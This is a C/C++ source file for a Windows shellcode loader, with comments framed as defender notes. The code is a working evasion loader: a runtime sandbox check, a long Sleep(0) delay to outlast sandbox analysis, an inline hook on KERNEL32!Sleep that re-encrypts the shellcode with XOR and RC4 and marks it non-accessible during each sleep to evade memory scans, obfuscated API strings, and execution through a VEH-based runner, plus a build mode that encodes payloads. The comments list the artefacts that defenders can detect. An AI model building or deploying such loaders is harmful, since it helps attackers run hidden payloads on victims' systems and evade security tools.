// Shellcode loader sample (single-line paste, reflowed here; tokens unchanged).
// Flow: runtime sandbox check -> long busy-wait -> inline-hook KERNEL32!Sleep
// -> decode the embedded shellcode buffer -> hand it to a VEH-based runner.
// Defender notes: the observable artefacts are the inline hook on Sleep, the
// repeated VirtualProtect toggling of a fixed 0x1000-byte region between
// PAGE_NOACCESS and PAGE_EXECUTE_READWRITE, the ~84M-iteration Sleep(0) loop at
// start-up, and DLL/API names that never appear as plain strings (xorstr_).
#include<stdio.h>
#include<Windows.h>
#include"CodeInject.h"
#include"AntiSandbox.h"
#include"Loader.h"
#include"shellcode.h"
#include"MyHook.h"
#include"xorstr.hpp"
#include"Crypto.h"

// Global hook object (CInlineHook, from MyHook.h) shared between main() and the
// Sleep detour; the detour removes and re-installs its own hook on every call.
CInlineHook MyHookObj;

// Detour installed over KERNEL32!Sleep by main().
// While the real Sleep runs, the shellcode buffer is re-encoded with the same
// XOR + RC4 steps that main() used to decode it (presumably both are symmetric,
// since the same calls are used in both directions — see Crypto.h) and its
// first 0x1000 bytes are set to PAGE_NOACCESS, so a memory scan taken during
// the sleep sees neither readable nor executable code.
// Order matters: UnHook64() first so the inner Sleep() reaches the original
// function, ReHook64() last so later Sleep calls are caught again.
// Return values of VirtualProtect are not checked; OldProtect is only a scratch
// out-parameter.
VOID WINAPI DetourSleep(_In_ DWORD dwMilliseconds){
    DWORD OldProtect = 0;
    MyHookObj.UnHook64();
    // encode: XOR then RC4 (reverse of the decode order used in main)
    Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
    Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
    // hard-coded 0x1000-byte region, independent of len_shellcode
    VirtualProtect(shellcode, 0x1000, PAGE_NOACCESS, &OldProtect);
    Sleep(dwMilliseconds);
    VirtualProtect(shellcode, 0x1000, PAGE_EXECUTE_READWRITE, &OldProtect);
    // decode: RC4 then XOR
    Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
    Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
    MyHookObj.ReHook64();
}

// Busy-wait: about 84 million (0xFFFFFF*5) Sleep(0) calls to burn wall-clock
// time before the payload runs — a sandbox-timeout style delay. main() calls
// this before Hook64(), so these Sleep(0) calls hit the real Sleep, not the
// detour above.
void __forceinline delay(){
    for (int i = 0; i < 0xFFFFFF*5; ++i)
        Sleep(0);
}

// ENCODE build: apply XOR then RC4 to the plaintext buffer from shellcode.h and
// print it as a C byte list (producing the encoded form the normal build ships).
// Normal build: runtime sandbox check, delay, hook Sleep, decode the buffer
// (RC4 then XOR — the reverse of ENCODE), then execute via Loader::VehRunShellcode.
// The commented-out lines are alternative loader entry points and a
// name-based sandbox check that are not compiled in.
// xorstr_() presumably hides "KERNEL32.DLL"/"Sleep" from the binary's plain
// string table; the names are only materialised at runtime.
int main(){
#ifdef ENCODE
    Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
    Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
    for (size_t i = 0; i < len_shellcode; i++)
        printf("0x%02x,", shellcode[i]);
#else
    //CHAR MyName[MAX_PATH] = "nvcontainer.exe";
    //AntiSandbox::AntiSandboxByName(MyName);
    AntiSandbox::AntiSandboxByRuntime();
    //AntiSandbox::AntiSandboxByRuntimeEx();
    delay();
    MyHookObj.Hook64(xorstr_("KERNEL32.DLL"), xorstr_("Sleep"), (PROC)DetourSleep);
    // decode in place: RC4 first, then XOR
    Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
    Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
    //Loader::RunShellCode_1(shellcode);
    //Loader::RunShellCode_2(shellcode);
    //Loader::InjectShellCode_1(shellcode);
    //Loader::CertEnumSystemStoreCallbackRunShellcode(shellcode);
    Loader::VehRunShellcode(shellcode);
#endif
    return 0;
}